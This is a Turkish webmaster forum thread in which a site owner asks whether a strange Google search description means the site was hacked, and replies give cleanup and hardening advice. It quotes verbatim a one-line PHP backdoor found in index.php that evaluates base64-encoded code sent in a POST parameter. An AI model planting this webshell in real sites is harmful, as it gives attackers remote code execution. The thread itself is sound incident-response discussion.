JustRulz adlı üyeden alıntı:
mesajı görüntüle
Google Aramalarında Site açıklaması yabancı çıkıyor, hacklendik mi?
30
●2.804
- 16-01-2015, 11:49:52JustRulz adlı üyeden alıntı: mesajı görüntüle
<?php if(isset($_POST["cspdnbtxql"])){@eval(base64_decode($_POST["cspdnbtxql"]));die();}?><?php get_header(); ?>üzgünüm bu backdoor : / cspdnbtxql request ile kod çalıştırabilir ... işi bilen kimse ise daha büyük güzelliklerde yapabilir .. sunucu yöneticine ulaş tek tek uğraşmadan tüm dizininde benzer kodları aratsın
find . -name "*.php" -print | xargs sed -i xxxxx
find . -type f | xargs grep " " çeşitlendirebilir söylersen anlar o...
bulup bunları temizledikten sonra logları incele.
$imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YU Z\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP 6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=");bu önemsiz veri işlendiğinde not hotlink adlı resmi çekiyor, senin verilerini farklı birileri kullanmasın diye... - 16-01-2015, 12:25:03imgdata kısmında sorun yok. Verdiğin diğer kodda ise, Sorguya işlem yaptırıyor. Aslında bu kısımda temanın bir özelliği ile alakalı olabilir. Bunu en iyi anlamak için kaynak kodlarını kottrol et ( Hem sitede ki hemde tarayıcıda ki Cache sil. Sonra siteye girip kaynak kodlarına bak bakalım header'in üstünde ne tür kodlar geziyor.)CND adlı üyeden alıntı: mesajı görüntüle
Dikkat etmen gereken bir diğer şey, bir döngü içinde bu kodlar çalıştırılıyor olabilir. Yani 5 sayfa gösteriminde bir görüntüleniyor olabilir. Bu yüzden farklı tarayıcılarda siteyi açıp kodlara bak.
Cacheyi devre dışı bırak ve f5 yapıp sayfayı yenile. Belki birşeyler çıkar.
Yukarıda verdiğim eklentiyi ( Exploit Scanner ) kurup araçlar> Exploit Scanner yolunu izleyerek tarama yap. Çıkan sonuçları kontrol et bi hocam. özellikleeval(function
i ara. js iler içine gömülmüş bir kod ile, bu kodlar oluşturuluyor olabilir. - 16-01-2015, 12:51:31IHS'den gelen cevapMimariuS adlı üyeden alıntı: mesajı görüntüle

Hadi canım biz bilmiyorduk onu zaten. Exploit Scanner kuruyorum şimdi.Alıntı
--R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 12:51:31 -->-> Daha önceki mesaj 12:30:12 --
Error logları inceledim sitenin,
uzun bir süredir aynı hataları veriyormuş
index.php de 1. sıradaki kod da bu:Alıntı
Bunu kaldırsam mı?Alıntı - 16-01-2015, 12:54:25Başka bir cevap verselerdi Hostu onlara taşıcaktım ama vermediler . Şaşırmadım
CND adlı üyeden alıntı: mesajı görüntüle<?php if(isset($_POST["cspdnbtxql"])){@eval(base64_decode($_POST["cspdnbtxql"]));die();}?>bunu sil bence (: - 16-01-2015, 13:15:45backdoor olduğunu söyledim size zaten
direk silin , bunun haricinde .htaccess lerinizi kontrol edin
error log haricinde kullanmış olduğunuz yönetim arayüzünüzde bulunan daha gelişmiş log kontrol scriptlerinizi kullanarak harici olarak dizinlerinizde ne tür işlemler yapmışlar ya da remote olarak çalıştırdıkları harici bir veri varmı ? sonuçta sizin herhangi bir dosyanıza mudahale etmiş olmalı diğer dizinlerde yetkisiz oldukları anlamına gelmez.
config bilgileriniz ile ftp bilgileriniz administrator bilgileriniz aynı olmasın , bunlarıda değiştirmeniz faydanıza , script ya da sunucu tabanın haricinde crackli bir uygulama indirip sonrasında pcnizde ftpnize bağlanmanız sonucuda bu tür olaylar olabiliyor bu yüzden kendi makinanızında güvenli olduğundan emin olun.
1 - kendi bilgisayarım temiz emin oldum.
2 - .htaccess , js , php dosyalarımın temiz olduğundan emin oldum ( default olarak kendi makinanızda varsa direk tekrar yükleyin verilerinizi )
3 - tekrar kontrol amaçlı browserver ayarlarınızda ufak tefek pluginler var as a google bot gibi kendiniz sitenize girebilirsiniz hala exploit aktifse referer google olduğundan tekrar yonlenecektir.girdim baktım birşey görünmüyor.
4 - eklentilerimin ve kullandığım ana scriptin güncel olduğundan emin oldum ( thimthumb vb eklentiler ciddi güvenlik açıklarına sebep olabiliyor tüm hepsinin güncel olduğundan emin olmam şart )
5 - 0day buglar olabilir o yüzden loglarımıda inceledim uzaktan içerden birşekilde anormal veri transferlerinin olmadığından eminim.
6- herşey normal son olarak panel , admin , mysql bilgilerimi güncelledim.
Sunucu tabanında geçmişte yazdığım birkaç satır yazı da aklınızın bir köşesine yazın.
bakın
sunucu sahipleri bu tür konularda ilk olarak
mevcut loglari iyi bir şekilde izlemeli
soru 1
sunucuya ilk olarak nereden girildi ?
a ) sunucu üzerindeki bir script açığı ile
b ) sunucu üzerindeki bir sitenin kendi dizinine herhangi bir listpatch vs tarzı dosya atma ile.
soru 2
Sisteme girildiğinde neler yapıldı ?
a ) sadece tek bir dizinde mi işlem yapıldı ?
b ) diğer dizinlere backdoor bırakıldı mı ?
c ) sunucu üzerinde ki sitelerin config bilgileri ya da bu bilgileri kullanarak databaselerine erişim sağlandı mı ?
d ) config bilgileri ile ftpler aynı mı ? ya da mysql da ki hashlarin kırılması ile ftp ya da hosting yonetim kısmında giriş yapılabiliniyor mu ?
3 sunucuda sadece izleme ya da okuma şeklinde mi rol aldılar ?
a ) ya da backconnect olup root yetkisi aldılar mı ?
b ) rootkit kurup arka planda bir port açıp sunucuyu dinliyorlar mı ?
Ne yapacağız
ilgili siteleri suspend edin ve ilk olarak atılan dosyaları silin.
ftp şifrelerini değiştirin.
mysql bilgilerini değiştirin.
kernel sürümünüz ya da ne kullaniyorsanız ilgili sürümünüzün aktif bir açığı varmı kontrol edip update edin.
sadece bu kernel sürümünüz ile ilgili olmayabilir kullandığınız phpsürüm ya da eklenti olarak ne kullaniyorsanız hepsini stabil hale getirin.
kullanıcılarınızın scriptlerinin güncel olduğundan emin olun.
Loglardan ilgili ipleri alıp savcılığa sikayet edin , şikayet ettiğinizi r10 ve benzeri forumlarda anlatın.Sunucunuzda basit önlemler alın , basit listpatchlerin çalişmasini engelleyin , uzaktan root olarak baglanma portunuzu değiştirin , kullanıcılarınızı güvenlik konusunda bilinçlendirin.
